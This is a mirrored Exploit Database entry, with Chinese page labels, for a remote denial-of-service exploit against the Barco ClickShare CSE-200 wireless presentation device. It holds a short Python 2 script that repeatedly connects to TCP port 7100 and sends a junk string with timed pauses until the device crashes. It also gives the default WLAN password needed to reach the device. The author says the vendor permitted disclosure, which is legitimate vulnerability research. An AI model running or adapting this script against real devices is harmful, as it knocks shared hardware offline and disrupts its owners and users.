Barco ClickShare CSE-200 – Remote Denial of Service

• Exploit Database
• 14 阅读

• 作者： Florian Hauser
  日期： 2018-04-16
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/44456/

• #!/usr/bin/python
  
  # Exploit Title: Barco ClickShare CSE-200 - Remote Denial of Service
  # Date: 11-04-2018
  # Hardware Link: https://www.barco.com/de/product/clickshare-cse-200
  # Exploit Author: Florian Hauser
  # Contact: florian DOT g DOT hauser AT gmail DOT com
  # CVE: requested by Barco
  # Category: Hardware
  
  #Disclaimer:
  #This or previous programs is for Educational 
  #purpose ONLY. Do not use it without permission. 
  #The usual disclaimer applies, especially the 
  #fact that Florian Hauser is not liable for any 
  #damages caused by direct or indirect use of the 
  #information or functionality provided by these 
  #programs. The author or any Internet provider 
  #bears NO responsibility for content or misuse 
  #of these programs or any derivatives thereof.
  #By using these programs you accept the fact 
  #that any damage (dataloss, system crash, 
  #system compromise, etc.) caused by the use 
  #of these programs is not Florian Hauser's 
  #responsibility.
  # 
  #Use them at your own risk!
  ################
  # Vulnerability description (you have to be connected to the ClickShare WLAN for that, standard password is 'clickshare'):
  # Sending arbitrary unexpected string to TCP port 7100 with respect to -> a certain time sequence <-
  # not only disconnects all clients but also results in a crash of this hardware device
  # Recover: Switch energy supply off for several minutes and reboot the system. Patches will be delivered in July 2018.
  # I got permission from Barco to disclose this vulnerability.
  # This affects potentially all other ClickShare products, Barco confirms
  
  import socket
  import sys
  from time import sleep
  
  if len(sys.argv) != 2:
  	print "Usage: exploit.py <ip>"
  	sys.exit(0)
  
  
  # Sending random string until crash occurs. Max. of 50 seems definitely sufficient for that.
  # 6-7 requests do the job usually
  for x in range(1,50):
  	#Create a new socket each time because otherwise the service drops the socket
  	#Same request cannot be sent several times in sequence
  	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  	
  	#Connect to vulnerable TCP port 7100
  	connect=s.connect((str(sys.argv[1]), 7100))
  	s.send('some evil string \r\n\n')
  	print "Buffer " + str(x) + " sent...\n"
  	
  	result=s.recv(1024)
  	print result
  	s.close()
  	
  	#Sleep for a few seconds because otherwise the service denies a socket creation but does not crash
  	sleep(7)